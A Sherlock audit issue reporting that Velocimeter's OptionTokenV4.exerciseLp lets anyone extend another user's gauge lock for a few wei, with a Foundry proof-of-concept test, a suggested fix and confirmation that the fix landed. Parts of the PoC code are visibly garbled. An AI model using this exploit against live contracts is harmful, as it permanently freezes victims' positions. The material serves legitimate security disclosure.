sherlock-audit / 2024-06-velocimeter-judging

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GalloDaSballo - `DepositWithLock` done via `OptionToken` can be abused to permanently lock a user position #20

Open sherlock-admin3 opened 1 month ago

sherlock-admin3 commented 1 month ago



DepositWithLock done via OptionToken can be abused to permanently lock a user position


OptionTokenV4.exerciseLp allows depositing to other people locks and extend it permanently at close to zero cost

Vulnerability Detail

GaugeV4.depositWithLock has a check to prevent someone else from re-locking a user position

    function depositWithLock(address account, uint256 amount, uint256 _lockDuration) external lock {
        require(msg.sender == account || isOToken[msg.sender],"Not allowed to deposit with lock"); 
        _deposit(account, amount, 0);

This check can be sidestepped by exercising a position on behalf of a victim via the OptionTokenV4

By doing this, any user can have their position permanently frozen at close to no cost to the attacker

The cost of the attack is 1 wei for each tokens involved (necessary to not revert on addLiquidity, meaning that the cost is extremely low


Victims will be unable to unlock their unlock their positions at close to no cost to the attacker

Code Snippet

The following POC demonstrates the attack The attacker spends 3 weis of oToken as well as dust amounts of DAI and Flow to increase the lock duration of the victim

function testExerciseLp_attack() public { 
        FLOW.approve(address(oFlowV4), TOKEN_1);
        // mint Option token to owner 2, TOKEN_1 - 3);

        address attacker = address(0xb4d);, 3);, 3);, 3);

        /// Not relevant 
        uint256 flowBalanceBefore = FLOW.balanceOf(address(owner2));
        uint256 oFlowV4BalanceBefore = oFlowV4.balanceOf(address(owner2));
        uint256 daiBalanceBefore = DAI.balanceOf(address(owner2));
        uint256 treasuryDaiBalanceBefore = DAI.balanceOf(address(owner));
        uint256 rewardGaugeDaiBalanceBefore = DAI.balanceOf(address(gauge));

        (uint256 underlyingReserve, uint256 paymentReserve) = IRouter(router).getReserves(address(FLOW), address(DAI), false);
        uint256 paymentAmountToAddLiquidity = (TOKEN_1 * paymentReserve) /  underlyingReserve;

        uint256 discountedPrice = oFlowV4.getLpDiscountedPrice(TOKEN_1,20);
        /// END Not revlevant

        DAI.approve(address(oFlowV4), TOKEN_100K);
        oFlowV4.exerciseLp(TOKEN_1 - 3, TOKEN_1 - 3, address(owner2),20,block.timestamp);

        // Check end
        uint256 end = gauge.lockEnd(address(owner2));

        /// @audit Move towards unlock
        vm.warp(end - 1);

        /// @audit Attacker locks for owner2, cost is negligible
        FLOW.approve(address(oFlowV4), TOKEN_1);
        DAI.approve(address(oFlowV4), TOKEN_100K);
        oFlowV4.exerciseLp(3, 3, address(owner2),20,block.timestamp);

        uint256 newEnd = gauge.lockEnd(address(owner2));
        /// @audit We delayed the claims with a cost of 3 oFLOW and 2 units of DAI
        assertGt(newEnd, end, "delayed");

Tool used

Manual Review


We should not be able to exercise on behalf of someone else AND increase their locks

Whenever the recipient is someone else, the lock should not be increased, or alternatively you remove the functionality and only allow the recipient to exercise

sherlock-admin2 commented 1 month ago

The protocol team fixed this issue in the following PRs/commits:

sherlock-admin2 commented 1 week ago

The Lead Senior Watson signed off on the fix.